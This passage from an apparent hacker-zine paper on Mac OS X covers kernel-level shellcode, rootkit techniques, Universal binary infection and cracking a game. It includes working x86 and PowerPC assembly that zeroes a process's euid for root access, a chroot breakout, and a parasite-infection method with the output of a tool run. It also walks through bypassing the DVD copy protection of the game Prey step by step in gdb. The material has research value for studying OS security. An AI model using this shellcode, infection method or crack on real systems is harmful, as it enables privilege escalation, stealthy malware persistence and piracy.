    0x00002018 in trap ()
    (gdb) x/i $pc
    0x2018 <trap+4>: trap


--[ 5 - Writing Kernel level shellcode

In this section we will look at some techniques for writing shellcode
for use when exploiting kernel level vulnerabilities.
A couple of things to note before we begin. Mac OS X does not share an address space for kernel/user space. Both the kernel and userspace have a 4gb address space each (0x0 -> 0xffffffff). I did not bother with writing PowerPC code again for most of what I've done, if you really want PowerPC code some concepts here will quickly port others require a little thought ;). --[ 5.1 - Local privilege escalation The first type of kernel shellcode we will look at writing is for local vulnerabilities. The typical objective for local kernel shellcode is simply to escalate the privileges of our userspace process. This topic was covered in noir's excellent paper on OpenBSD kernel exploitation in Phrack 60. [6] A lot of the techniques from noir's paper apply directly to Mac OS X. noir shows that the sysctl() function can be used to retrieve the kinfo_proc struct for a particular process id. As you can see below one of the members of the kinfo_proc struct is a pointer to the proc struct. struct kinfo_proc { struct extern_proc kp_proc; /* proc structure */ struct eproc { struct proc *e_paddr; /* address of proc */ struct session *e_sess; /* session pointer */ struct _pcred e_pcred; /* process credentials */ struct _ucred e_ucred; /* current credentials */ struct vmspace e_vm; /* address space */ pid_t e_ppid; /* parent process id */ pid_t e_pgid; /* process group id */ short e_jobc; /* job control counter */ dev_t e_tdev; /* controlling tty dev */ pid_t e_tpgid; /* tty process group id */ struct session *e_tsess; /* tty session pointer */ #define WMESGLEN 7 char e_wmesg[WMESGLEN+1]; /* wchan message */ segsz_t e_xsize; /* text size */ short e_xrssize; /* text rss */ short e_xccount; /* text references */ short e_xswrss; int32_t e_flag; #define EPROC_CTTY 0x01 /* controlling tty vnode active */ #define EPROC_SLEADER 0x02 /* session leader */ #define COMAPT_MAXLOGNAME 12 char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/ int32_t e_spare[4]; } kp_eproc; }; Ilja van Sprundel 
mentioned this technique in his talk at Blackhat [7]. Basically, we can use the leaked address "p.kp_eproc.e_paddr" to access the proc struct for our process in memory.

The following function will return the address of a pid's proc struct in the kernel.

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/sysctl.h>

    long get_addr(pid_t pid)
    {
        int i, mib[4];
        size_t sz = sizeof(struct kinfo_proc);  /* sysctl() expects a size_t */
        struct kinfo_proc p;

        mib[0] = CTL_KERN;
        mib[1] = KERN_PROC;
        mib[2] = KERN_PROC_PID;
        mib[3] = pid;

        i = sysctl(mib, 4, &p, &sz, 0, 0);
        if (i == -1) {
            perror("sysctl()");
            exit(1);
        }

        return((long)p.kp_eproc.e_paddr);
    }

Now that we have the address of our proc struct, we simply have to change our uid and/or euid in their respective structures. Here is a snippet from the proc struct:

    struct proc {
        LIST_ENTRY(proc) p_list;        /* List of all processes. */

        /* substructures: */
        struct  ucred *p_ucred;         /* Process owner's identity. */
        struct  filedesc *p_fd;         /* Ptr to open files structure. */
        struct  pstats *p_stats;        /* Accounting/statistics (PROC ONLY). */
        struct  plimit *p_limit;        /* Process limits. */
        struct  sigacts *p_sigacts;     /* Signal actions, state (PROC ONLY). */
        ...
    }

As you can see, following the p_list there is a pointer to the ucred struct. This struct is shown below.

    struct _ucred {
        int32_t cr_ref;                 /* reference count */
        uid_t   cr_uid;                 /* effective user id */
        short   cr_ngroups;             /* number of groups */
        gid_t   cr_groups[NGROUPS];     /* groups */
    };

By changing the cr_uid field in this struct, we set the euid of our process.

The following assembly code will seek to this struct and null out the ucred cr_uid field. This leaves us with root privileges on an Intel platform.

    SECTION .text
    _main:
        mov     ebx, [0xdeadbeef]       ;# ebx = proc address
        mov     ecx, [ebx + 8]          ;# ecx = ucred
        xor     eax,eax
        mov     [ecx + 12], eax         ;# zero out the euid
        ret

To use this code we need to replace the address 0xdeadbeef with the address of the proc struct which we looked up earlier.

Here is some code from Ilja van Sprundel's talk which does the same thing on a PowerPC platform.
    int kshellcode[] = {
        0x3ca0aabb, // lis r5, 0xaabb
        0x60a5ccdd, // ori r5, r5, 0xccdd
        0x80c5ffa8, // lwz r6, -88(r5)
        0x80e60048, // lwz r7, 72(r6)
        0x39000000, // li r8, 0
        0x9106004c, // stw r8, 76(r6)
        0x91060050, // stw r8, 80(r6)
        0x91060054, // stw r8, 84(r6)
        0x91060058, // stw r8, 88(r6)
        0x91070004  // stw r8, 4(r7)
    };

We can combine the two shellcodes into one architecture spanning shellcode. This is a simple process and is documented in section 4 of this paper. The full listing for our multi-arch code is shown in the Appendix.

On PowerPC processors XNU uses an optimization referred to as the "user memory window". This means that the user address space and the kernel address space share some mappings. This design is in place for copyin/copyout etc to use. The user memory window typically starts at 0xe0000000 in both the kernel and user address space. This can be useful when trying to position shellcode for use in local privilege escalation vulnerabilities.

--[ 5.2 - Breaking chroot()

Before we look into how we can go about breaking out of processes after they have used the chroot() syscall, we will take a look at why, a lot of the time, we don't need to.

    -[root@fry:/chroot]# touch file_outside_chroot
    -[root@fry:/chroot]# ls -lsa file_outside_chroot
    0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 file_outside_chroot
    -[root@fry:/chroot]# chroot demo /bin/sh
    -[root@fry:/]# ls -lsa file_outside_chroot
    ls: file_outside_chroot: No such file or directory
    -[root@fry:/]# pwd
    /
    -[root@fry:/]# ls -lsa ../file_outside_chroot
    0 -rw-r--r--   1 root  admin  0 Jan 29 20:17 ../file_outside_chroot
    -[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh
    -[root@fry:/]# ls -lsa /chroot/file_outside_chroot
    0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 /chroot/file_outside_chroot

As you can see, the /usr/sbin/chroot command which ships with Mac OS X does not chdir() and therefore does not really do very much at all.
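For contrast, the usual pattern for a program that wants to confine itself is to chdir() into the new root before calling chroot(), and to chdir("/") afterwards, so that the working directory never points outside the jail. The following is only a minimal sketch of that pattern; the helper name enter_jail() is made up for this example and is not taken from the Mac OS X chroot source.

```c
#define _DEFAULT_SOURCE         /* expose chroot() on glibc; harmless elsewhere */
#include <unistd.h>

/*
 * Hypothetical helper: confine the calling process to `dir`.
 * Returns 0 on success and -1 on failure (errno is left as set by the
 * call which failed). chroot() itself requires root privileges.
 */
int enter_jail(const char *dir)
{
    if (chdir(dir) == -1)       /* step inside the new root first */
        return -1;
    if (chroot(".") == -1)      /* make the current directory the root */
        return -1;
    if (chdir("/") == -1)       /* cwd is now the root of the jail */
        return -1;
    return 0;
}
```

A caller would normally drop root privileges straight after enter_jail() returns 0, since a process which is still root inside the jail can simply call chroot() again.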
The author suggests the following addition be made to the chroot man page on Mac OS X:

    "Caution: Does not work."

On an unrelated note, this patch would also be suitable for the setreuid() man page.

I won't spend too much time on this since noir already covered it really well in his paper. [6]

Basically as noir mentions, all we need to do to break our process out of the chroot() is to set the p->p_fd->fd_rdir element in our proc struct to NULL. We can get the address of our proc struct using sysctl as mentioned earlier.

noir already provides us with the instructions for this:

    mov     edx,[ecx + 0x14]        ;# edx = p->p_fd
    mov     [edx + 0xc],eax         ;# p->p_fd->fd_rdir = 0

--[ 5.3 - Advancements

Now that we are familiar with writing shellcode for use in local exploits, where we already have local access to the box, the rest of the kernel related code in this paper will focus on accomplishing its task without any userspace access required.

In order to do this, we can utilize the per-cpu, task, proc and thread structures in the kernel. The definitions for each of these structures can be found in the osfmk/kern and bsd/sys/ directories in various header files.

The first struct which we will look at is the "cpu_data" struct found in osfmk/i386/cpu_data.h. I have included the definition for this struct below:

    /*
     * Per-cpu data.
     *
     * Each processor has a per-cpu data area which is dereferenced through the
     * using this, in-lines provides single-instruction access to frequently
     * used members - such as get_cpu_number()/cpu_number(), and
     * get_active_thread()/ current_thread().
     *
     * Cpu data owned by another processor can be accessed using the
     * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of
     * per-cpu pointers.
*/ typedef struct cpu_data { struct cpu_data *cpu_this; /* pointer to myself */ thread_t cpu_active_thread; void *cpu_int_state; /* interrupt state */ vm_offset_t cpu_active_stack; /* kernel stack base */ vm_offset_t cpu_kernel_stack; /* kernel stack top */ vm_offset_t cpu_int_stack_top; int cpu_preemption_level; int cpu_simple_lock_count; int cpu_interrupt_level; int cpu_number; /* Logical CPU */ int cpu_phys_number; /* Physical CPU */ cpu_id_t cpu_id; /* Platform Expert */ int cpu_signals; /* IPI events */ int cpu_mcount_off; /* mcount recursion */ ast_t cpu_pending_ast; int cpu_type; int cpu_subtype; int cpu_threadtype; int cpu_running; uint64_t rtclock_intr_deadline; rtclock_timer_t rtclock_timer; boolean_t cpu_is64bit; task_map_t cpu_task_map; addr64_t cpu_task_cr3; addr64_t cpu_active_cr3; addr64_t cpu_kernel_cr3; cpu_uber_t cpu_uber; void *cpu_chud; void *cpu_console_buf; struct cpu_core *cpu_core; /* cpu's parent core */ struct processor *cpu_processor; struct cpu_pmap *cpu_pmap; struct cpu_desc_table *cpu_desc_tablep; struct fake_descriptor *cpu_ldtp; cpu_desc_index_t cpu_desc_index; int cpu_ldt; #ifdef MACH_KDB /* XXX Untested: */ int cpu_db_pass_thru; vm_offset_t cpu_db_stacks; void *cpu_kdb_saved_state; spl_t cpu_kdb_saved_ipl; int cpu_kdb_is_slave; int cpu_kdb_active; #endif /* MACH_KDB */ boolean_t cpu_iflag; boolean_t cpu_boot_complete; int cpu_hibernate; pmsd pms; /* Power Management Stepper control */ uint64_t rtcPop; /* when the etimer wants a timer pop */ vm_offset_t cpu_copywindow_bas; uint64_t *cpu_copywindow_pdp; vm_offset_t cpu_physwindow_base; uint64_t *cpu_physwindow_ptep; void *cpu_hi_iss; boolean_t cpu_tlb_invalid; uint64_t *cpu_pmHpet; /* Address of the HPET for this processor */ uint32_t cpu_pmHpetVec; /* Interrupt vector for HPET for this processor */ /* Statistics */ pmStats_t cpu_pmStats; /* Power management data */ uint32_t cpu_hwIntCnt[256]; /* Interrupt counts */ uint64_t cpu_dr7; /* debug control register */ } cpu_data_t; As you 
can see, this structure contains valuable information for our shellcode running in the kernel. We just need to figure out how to access it. The following macro shows how we can access this structure. /* Macro to generate inline bodies to retrieve per-cpu data fields. */ #define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER) #define CPU_DATA_GET(member,type) \ type ret; \ __asm__ volatile ("movl %%gs:%P1,%0" \ : "=r" (ret) \ : "i" (offsetof(cpu_data_t,member))); \ return ret; When our code is executing in kernel space the gs selector can be used to access our cpu_data struct. The first element of this struct contains a pointer to the struct itself, so we no longer need to use gs after this. The first objective we will look at is the ability to find the init process (pid=1) via this struct. Since our code may not be running with an associated user space thread, we cannot count on the uthread struct being populated in our thread_t struct. An example of this might be when we exploit a network stack or kernel extension. The first step we must make to find the init process struct is to retrieve the pointer to our thread_t struct. We can do this by simply retrieving the pointer at gs:0x04. The following instructions will achieve this: _main: xor ebx,ebx ;# zero ebx mov eax,[gs:0x04 + ebx] ;# thread_t. After these instructions are executed, we have a pointer to our thread struct in eax. The thread struct is defined in osfmk/kern/thread.h. A portion of this struct is shown below: struct thread { ... queue_chain_t links; /* run/wait queue links */ run_queue_t runq; /* run queue thread is on SEE BELOW */ wait_queue_t wait_queue; /* wait queue we are currently on */ event64_t wait_event; /* wait queue event */ integer_t options;/* options set by thread itself */ ... /* Data used during setrun/dispatch */ timer_data_t system_timer; /* system mode timer */ processor_set_t processor_set;/* assigned processor set */ processor_t bound_processor; /* bound to a processor? 
*/
        processor_t       last_processor; /* processor last dispatched on */
        uint64_t          last_switch;    /* time of last context switch */
        ...
        void    *uthread;
    #endif
    };

This struct, again, contains many fields which are useful for our shellcode. However, in this case we are trying to find the proc struct. Because we might not necessarily already have a uthread associated with us, as mentioned earlier, we must look elsewhere for a list of tasks to locate init (launchd).

The next step in this process is to retrieve the "last_processor" element from our thread_t struct. We do this using the following instructions:

    mov     bl,0xf4
    mov     ecx,[eax + ebx]         ;# last_processor

The last_processor pointer points to a processor struct as the name suggests ;) We can walk from the last_processor struct back to the default pset in order to find the pset which contains init.

    mov     eax,[ecx]               ;# default_pset + 0xc

We then retrieve the task head from this struct.

    push    word 0x458
    pop     bx
    mov     eax,[eax + ebx]         ;# tasks head.

And retrieve the bsd_info element of the task. This is a proc struct pointer.

    push    word 0x19c
    pop     bx
    mov     eax,[eax + ebx]         ;# get bsd_info

The proc struct is defined in xnu/bsd/sys/proc_internal.h. The first element of the proc struct is:

    LIST_ENTRY(proc) p_list;        /* List of all processes. */

We can walk this list to find a particular process that we want. For most of our code we will start with a pointer to the init process (launchd on Mac OS X). This process has a pid of 1. To find this we simply walk the list checking the pid field at offset 36. The code to do this is as follows:

    next_proc:
        mov     eax,[eax+4]         ;# prev
        mov     ebx,[eax + 36]      ;# pid
        dec     ebx
        test    ebx,ebx             ;# if pid was 1
        jnz     next_proc
    done:
        ;# eax = struct proc *init;

Now that we have developed code which will retrieve a pointer to the proc struct for the init process, we can look at some of the things that we can accomplish using this pointer.
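The list walk itself is easier to follow in C. The sketch below is a user space model only: struct toy_proc and find_pid() are names invented for this example, and the layout is deliberately simplified (in particular, the real LIST_ENTRY stores a pointer to the previous element's next pointer rather than to the element itself). Unlike the assembly, this version also checks the starting node and stops when it runs off the end of the list instead of looping forever.

```c
#include <stddef.h>

/*
 * Hypothetical, simplified stand-in for struct proc. The real layout
 * lives in bsd/sys/proc_internal.h and differs between releases.
 */
struct toy_proc {
    struct toy_proc *next;
    struct toy_proc *prev;
    int              pid;
};

/*
 * Follow the prev links from `start` until a node with the requested
 * pid is found. Returns NULL if the end of the list is reached first.
 */
struct toy_proc *find_pid(struct toy_proc *start, int pid)
{
    struct toy_proc *p;

    for (p = start; p != NULL; p = p->prev) {
        if (p->pid == pid)
            return p;
    }
    return NULL;
}
```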
The first thing which we will look at is simply rewriting the privilege escalation code listed earlier. Our new version of this code will not require any help from userspace (sysctl etc). I think the below code is fairly self explanatory. %define PID 1337 find_pid: mov eax,[eax + 4] ;# eax = next proc mov ebx,[eax + 36] ;# pid cmp bx,PID jnz find_pid mov ecx, [eax + 8] ;# ecx = ucred xor eax,eax mov [ecx + 12], eax ;# zero out the euid As you can see the cpu_data struct opens up many possibilities for our shellcode. Hopefully I will have time to go into some of these in a future paper. --[ 6 - Misc Rootkit Techniques In this section I will run over a few short pieces of information which might be relevant to someone who is developing a rootkit for Mac OS X. I didn't really have another place to put this stuff, so this will have to do. The first thing to note is that an API exists [21] for executing userspace applications from kernelspace. This is called the Kernel User Notification Daemon. This is implemented using a mach port which the kernel uses to communicate with a userspace daemon named kuncd. The file xnu/osfmk/UserNotification/UNDRequest.defs contains the Mach Interface Generator (MIG) interface definitions for the communication with this daemon. The mach port is called: "com.apple.system.Kernel[UNC]Notifications" and is registered by the daemon /usr/libexec/kuncd. Here is an example of how to use this interface programmatically. The interface allows you to display messages via the GUI to the user, and also run any application. kern_return_t ret; ret = KUNCExecute( "/Applications/TextEdit.app/Contents/MacOS/TextEdit", kOpenAppAsRoot, kOpenApplicationPath ); ret = KUNCExecute( "Internet.prefPane", kOpenAppAsConsoleUser, kOpenPreferencePanel ); There may be a situation where you wish code to be executed on all the processors on a system. This may be something like updating the IDT / MSR and not wanting a processor to miss out on it. 
The xnu kernel provides a function for this. The comment and prototype explain this a lot better than I can. So here you go:

    /*
     * All-CPU rendezvous:
     *      - CPUs are signalled,
     *      - all execute the setup function (if specified),
     *      - rendezvous (i.e. all cpus reach a barrier),
     *      - all execute the action function (if specified),
     *      - rendezvous again,
     *      - execute the teardown function (if specified), and then
     *      - resume.
     *
     * Note that the supplied external functions _must_ be reentrant and aware
     * that they are running in parallel and in an unknown lock context.
     */
    void
    mp_rendezvous(void (*setup_func)(void *),
                  void (*action_func)(void *),
                  void (*teardown_func)(void *),
                  void *arg)
    {

The code for the functions related to this is stored in xnu/osfmk/i386/mp.c.

--[ 7 - Universal Binary Infection

The Mach-O object format is used on operating systems which have a kernel based on Mach. This is the format which is used by Mac OS X. Significant work has already been done regarding the infection of this format. The papers [12] and [13] show some of this. Mach-O files can be identified by the first four bytes of the file which contain the magic number 0xfeedface.

Recently Mac OS X has moved from the PowerPC platform to Intel architecture. This move has caused a new binary format to be used for most of the applications on Mac OS X 10.4. The Universal binary format is defined in the Mach-O Runtime reference from Apple [4].

The Universal binary format is a fairly trivial archive format which allows for multiple Mach-O files of varying architecture types to be stored in a single file.
The loader on Mac OS X is able to interpret this file and distinguish which of the Mach-O files inside the archive matches the architecture type of the current system. (We'll look at this a little more later.)

The structures used by Mac OS X to define and parse Universal binaries are contained in the file /usr/include/mach-o/fat.h.

Universal binaries are recognizable, again, by the magic number in the first four bytes of the file. Universal binaries begin with the following header:

    struct fat_header {
        uint32_t        magic;          /* FAT_MAGIC */
        uint32_t        nfat_arch;      /* number of structs that follow */
    };

The magic number on a Universal binary is as follows:

    #define FAT_MAGIC       0xcafebabe
    #define FAT_CIGAM       0xbebafeca      /* NXSwapLong(FAT_MAGIC) */

Either FAT_MAGIC or FAT_CIGAM is used depending on the endianness of the file/system.

The nfat_arch field of this structure contains the number of Mach-O files of which the archive is comprised. On a side note, if you set this high enough to wrap, just about every debugging tool on Mac OS X will crash, as demonstrated below:

    -[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file
    -[nemo@fry:~]$ otool -tv file
    Segmentation fault

For each of the Mach-O files in the Universal binary there is also a fat_arch structure. This structure is shown below:

    struct fat_arch {
        cpu_type_t      cputype;        /* cpu specifier (int) */
        cpu_subtype_t   cpusubtype;     /* machine specifier (int) */
        uint32_t        offset;         /* file offset to this object file */
        uint32_t        size;           /* size of this object file */
        uint32_t        align;          /* alignment as a power of 2 */
    };

The fat_arch structure defines the architecture type of the Mach-O file, as well as the offset into the Universal binary in which it is stored. It also contains the alignment of the architecture for the particular file, expressed as a power of 2.
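To make the two structures concrete, here is a minimal sketch of a parser for them which works on a buffer already read from disk. It is not taken from any Apple tool: the names parse_fat(), fat_arch_info and be32() are invented for this example. The fields of the fat header are stored big-endian on disk, so each one is assembled byte by byte, which keeps the code independent of the host byte order. Note the bounds check on nfat_arch, which is exactly the check the 0x66666666 example above relies on being absent.

```c
#include <stddef.h>
#include <stdint.h>

#define FAT_MAGIC       0xcafebabeu
#define FAT_HEADER_SIZE 8u      /* magic + nfat_arch */
#define FAT_ARCH_SIZE   20u     /* five 32-bit fields */

/* Hypothetical host-order copy of one fat_arch entry. */
struct fat_arch_info {
    uint32_t cputype, cpusubtype, offset, size, align;
};

/* Read a big-endian 32-bit value from an unaligned buffer. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/*
 * Parse the fat_header and up to `max` fat_arch entries from `buf`.
 * Returns the number of entries written to `out`, or -1 if the buffer
 * does not start with FAT_MAGIC or nfat_arch claims more entries than
 * the buffer can possibly hold.
 */
int parse_fat(const unsigned char *buf, size_t len,
              struct fat_arch_info *out, size_t max)
{
    uint32_t n;
    size_t i, count;

    if (len < FAT_HEADER_SIZE || be32(buf) != FAT_MAGIC)
        return -1;

    n = be32(buf + 4);
    if (n > (len - FAT_HEADER_SIZE) / FAT_ARCH_SIZE)
        return -1;              /* bogus count, refuse to walk off the end */

    count = n < max ? n : max;
    for (i = 0; i < count; i++) {
        const unsigned char *e = buf + FAT_HEADER_SIZE + i * FAT_ARCH_SIZE;

        out[i].cputype    = be32(e);
        out[i].cpusubtype = be32(e + 4);
        out[i].offset     = be32(e + 8);
        out[i].size       = be32(e + 12);
        out[i].align      = be32(e + 16);
    }
    return (int)count;
}
```

Fed the eight bytes from the printf example above, parse_fat() returns -1 rather than trusting the count.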
The diagram below describes the layout of a typical Universal binary:

    ._________________________________________________,
    |0xcafebabe                                       |
    |               struct fat_header                 |
    |-------------------------------------------------|
    |               fat_arch struct #1                |------------+
    |-------------------------------------------------|            |
    |               fat_arch struct #2                |---------+  |
    |-------------------------------------------------|         |  |
    |               fat_arch struct #n                |------+  |  |
    |-------------------------------------------------|<-----------+
    |0xfeedface                                       |      |  |
    |                                                 |      |  |
    |               Mach-O File #1                    |      |  |
    |                                                 |      |  |
    |                                                 |      |  |
    |-------------------------------------------------|<--------+
    |0xfeedface                                       |      |
    |                                                 |      |
    |               Mach-O File #2                    |      |
    |                                                 |      |
    |                                                 |      |
    |-------------------------------------------------|<-----+
    |0xfeedface                                       |
    |                                                 |
    |               Mach-O file #n                    |
    |                                                 |
    |                                                 |
    '-------------------------------------------------'

Here you can see the file beginning with a fat_header structure. Following this are n fat_arch structures, each defining the offset into the file at which the Mach-O file it describes can be found. Finally, the n Mach-O files are appended after the structs.

Before I run through the method for infecting Universal binaries I will first show how the kernel loads them.

The file xnu/bsd/kern/kern_exec.c contains the code shown in this section.

First the kernel sets up a NULL terminated array of execsw structs. Each of these structures contains a function pointer to an image activator / parser for one of the image types, as well as a relevant string description. The definition and declaration of this array is shown below:

    /*
     * Our image activator table; this is the table of the image types we are
     * capable of loading.  We list them in order of preference to ensure the
     * fastest image load speed.
* * XXX hardcoded, for now; should use linker sets */ struct execsw { int (*ex_imgact)(struct image_params *); const char *ex_name; } execsw[] = { { exec_mach_imgact, "Mach-o Binary" }, { exec_fat_imgact, "Fat Binary" }, #ifdef IMGPF_POWERPC { exec_powerpc32_imgact, "PowerPC binary" }, #endif /* IMGPF_POWERPC */ { exec_shell_imgact, "Interpreter Script" }, { NULL, NULL} }; The following code from the execve() system call loops through each of the elements in this array and calls the function pointer for each one. A pointer to the start of the image is passed to it. int execve(struct proc *p, struct execve_args *uap, register_t *retval) { ... for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) { error = (*execsw[i].ex_imgact)(imgp); Each of the functions parses the file to determine if the file is of the appropriate architecture type. The function which is responsible for matching and parsing Universal binaries is the "exec_fat_imgact" function. The declaration of this function is below: /* * exec_fat_imgact * * Image activator for fat 1.0 binaries. If the binary is fat, then we * need to select an image from it internally, and make that the image * we are going to attempt to execute. At present, this consists of * reloading the first page for the image with a first page from the * offset location indicated by the fat header. * * Important: This image activator is byte order neutral. * * Note: If we find an encapsulated binary, we make no assertions * about its validity; instead, we leave that up to a rescan * for an activator to claim it, and, if it is claimed by one, * that activator is responsible for determining validity. */ static int exec_fat_imgact(struct image_params *imgp) The first thing this function does is test the magic number at the top of the file. The following code does this. 
    /* Make sure it's a fat binary */
    if ((fat_header->magic != FAT_MAGIC) &&
        (fat_header->magic != FAT_CIGAM)) {
            error = -1;
            goto bad;
    }

The fatfile_getarch_affinity() function is then called to search the Universal binary for a Mach-O file with the appropriate architecture type for the system.

    /* Look up our preferred architecture in the fat file. */
    lret = fatfile_getarch_affinity(imgp->ip_vp,
                                    (vm_offset_t)fat_header,
                                    &fat_arch,
                                    (p->p_flag & P_AFFINITY));

This function is defined in the file xnu/bsd/kern/mach_fat.c.

    load_return_t
    fatfile_getarch_affinity(
            struct vnode    *vp,
            vm_offset_t     data_ptr,
            struct fat_arch *archret,
            int             affinity)

This function searches each of the Mach-O files within the Universal binary. A host has a primary and secondary architecture. If during this search a Mach-O file is found which matches the primary architecture type for the host, this file is used. If, however, the primary architecture type is not found, yet the secondary type is found, this will be used. This is useful when infecting this format.

Once an appropriate Mach-O file has been located the imgp ip_arch_offset and ip_arch_size attributes are updated to reflect the new position in the file.

    /* Success.  Indicate we have identified an encapsulated binary */
    error = -2;
    imgp->ip_arch_offset = (user_size_t)fat_arch.offset;
    imgp->ip_arch_size = (user_size_t)fat_arch.size;

After this exec_fat_imgact() simply returns and lets execve() continue walking the execsw[] struct array to find an appropriate loader for the new file.

This logic means that it does not really matter if the true architecture type of the file matches up with the architecture specified in its fat_arch struct within the Universal binary. Once a Mach-O file is chosen it will be treated as a fresh binary.

The method which I propose to infect Universal binaries utilizes this behavior. A breakdown of this method is as follows:

    1) Determine the primary and secondary architecture types for the host machine.
    2) Parse the fat_header struct of the host binary.
    3) Walk through the fat_arch structs and locate the struct for the secondary architecture type.
    4) Check that the size of the parasite is smaller than the secondary architecture Mach-O file in the Universal binary.
    5) Copy the parasite binary directly over the secondary arch binary inside the Universal binary.
    6) Locate the primary architecture's fat_arch structure.
    7) Modify the architecture type field in this structure to be 0xdeadbeef.

Now when the binary is executed, the primary architecture is not found. Due to this, the secondary architecture is used. The imgp is set to point to the offset in the file containing our parasite, and this is executed as expected.

The parasite then opens its own binary (which is quite possible on Mac OS X) and performs a linear search for 0xdeadbeef. It then modifies this value, changing it back to the primary architecture type, and execve()'s its own file.

Some sample code has been provided with this paper that demonstrates this method on Intel architecture. The code unipara.c will copy an Intel architecture Mach-O file over the PowerPC Mach-O file inside a Universal binary. After infection has occurred the size of the host file remains unchanged.

    -[nemo@fry:~/code/unipara]$ ./unipara host parasite
    -[nemo@fry:~/code/unipara]$ ./host
    uid=501(nemo) gid=501(nemo)
    -[nemo@fry:~/code/unipara]$ wc -c host
       43028 host
    -[nemo@fry:~/code/unipara]$ ./unipara parasite host
    [+] Initiating infection process.
    [+] Found: 2 arch structs.
    [+] We are good to go, attaching parasite.
    [+] parasite implanted at offset: 0x6000
    [+] Switching arch types to execute our parasite.
    -[nemo@fry:~/code/unipara]$ wc -c host
       43028 host
    -[nemo@fry:~/code/unipara]$ ./host
    Hello, World!
    uid=501(nemo) gid=501(nemo)

If residency is required after the payload has already been executed, the parasite can simply fork() before modifying its binary.
The parent process can then execve() while the child waits and then returns the architecture type to 0xdeadbeef. --[ 8 - Cracking Example - Prey Recently, during an extra long stopover in LAX airport (the most boring airport in the entire world) I decided I would pass the time by playing the game "Prey" which I had installed onto my laptop. To my horror, when I tried to start up my game, I was greeted with the following error message: "Please insert the disc "Prey" or press Quit." "Veuillez inserer le disque "Prey" ou appuyer sur Quitter." "Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie auf Beenden." Since I had nothing better to do, I decided to spend some time removing this error message. First things first I determined the object format of the executable file. -[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ file Prey Prey: Mach-O universal binary with 2 architectures Prey (for architecture ppc): Mach-O executable ppc Prey (for architecture i386): Mach-O executable i386 The Prey executable is a Universal binary containing a PowerPC and an i386 Mach-O binary. Next I ran the otool -o command to determine if the code was written in Objective-C. The output from this command shows that an Objective-C segment is present in the file. -[nemo@largeprompt]$ otool -o Prey | head -n 5 Prey: Objective-C segment Module 0x27ef458 version 6 size 16 I then used the "class-dump" command [14] to dump the class definitions from the file. Probably the most interesting of which is shown below: @interface DOOMController (Private) - (void)quakeMain; - (BOOL)checkRegCodes; - (BOOL)checkOS; - (BOOL)checkDVD; @end Most games on Mac OS X are 10 years behind their Windows counterparts when it comes to copy protection. Typically the developers don't even strip the file and symbols are still present. Because of this fact, I fired up gdb and put a breakpoint on the main function. 
    (gdb) break main
    Breakpoint 1 at 0x96b64

However when I executed the file the error message was displayed prior to my breakpoint in main being reached. This led me to the conclusion that a constructor function was responsible for the check.

To validate this theory I ran the command "otool -l" on the binary to list the load commands present in the file. (The Mach-O Runtime Document [4] explains the load_command struct clearly.)

Each section in the Mach-O file has a "flags" value associated with it. This describes the purpose of the section. Possible values for this flags variable are found in the file /usr/include/mach-o/loader.h. The value which represents a constructor section is defined as follows:

    /* section with only function pointers for initialization*/
    #define S_MOD_INIT_FUNC_POINTERS        0x9

Looking through the "otool -l" output there is only one section which has the flags value 0x9. This section is shown below:

    Section
      sectname __mod_init_func
       segname __DATA
          addr 0x00515cec
          size 0x00000380
        offset 5328108
         align 2^2 (4)
        reloff 0
        nreloc 0
         flags 0x00000009
     reserved1 0
     reserved2 0

Now that the virtual address of the constructor section for this application was known, I simply fired up gdb again and put breakpoints on each of the pointers contained in this section.

    (gdb) x/x 0x00515cec
    0x515cec <_ZTI14idSIMD_Generic+12>:     0x028cc8db
    (gdb)
    0x515cf0 <_ZTI14idSIMD_Generic+16>:     0x00495852
    (gdb)
    0x515cf4 <_ZTI14idSIMD_Generic+20>:     0x0049587c
    ...

    (gdb) break *0x028cc8db
    Breakpoint 1 at 0x28cc8db
    (gdb) break *0x00495852
    Breakpoint 2 at 0x495852
    (gdb) break *0x0049587c
    Breakpoint 3 at 0x49587c
    ...

I then executed the program. As expected the first breakpoint was hit before the error message box was displayed.

    (gdb) r
    Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey

    Breakpoint 1, 0x028cc8db in dyld_stub_log10f ()
    (gdb) continue

I then continued execution and the error message appeared. This happened before the second breakpoint was reached.
This indicated that the first pointer in the __mod_init_func was responsible for the DVD checking process. In order to validate my theory I restarted the process. This time I deleted all breakpoints except the first one. (gdb) delete Delete all breakpoints? (y or n) y (gdb) break *0x028cc8db Breakpoint 4 at 0x28cc8db (gdb) r Starting program: /Applications/Prey/Prey.app/Contents/MacOS/Prey Reading symbols for shared libraries . done Once the breakpoint is reached, I simply "return" from the constructor, without testing for the DVD. Breakpoint 4, 0x028cc8db in dyld_stub_log10f () (gdb) ret Make selected stack frame return now? (y or n) y #0 0x8fe0fcc4 in _dyld__ZN16ImageLoaderMachO16doInitialization... () And then continue execution. (gdb) c The error message was gone and Prey started up as if the DVD was in the drive, SUCCESS! After playing the game for about 10 minutes and running through the same boring corridor over and over again I decided it was more fun to continue cracking the game than to actually play it. I exited the game and returned to my shell. In order to modify the binary I used the HT Editor. [15] Before I could use HTE to modify this file however, I had to extract the appropriate architecture for my system from the Universal binary. I accomplished this using the ditto command as follows. -[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ ditto -arch i386 Prey Prey.i386 -[nemo@fry:/Prey/Prey.app/Contents/MacOS]$ cp Prey Prey.backup -[nemo@fry:/Applications/Prey/Prey.app/Contents/MacOS]$ cp Prey.i386 Prey I then loaded the file in HTE. I pressed F6 to select the mode and chose the Mach-O/header option. I then scrolled down to find the __mod_init_func section. This is shown as follows: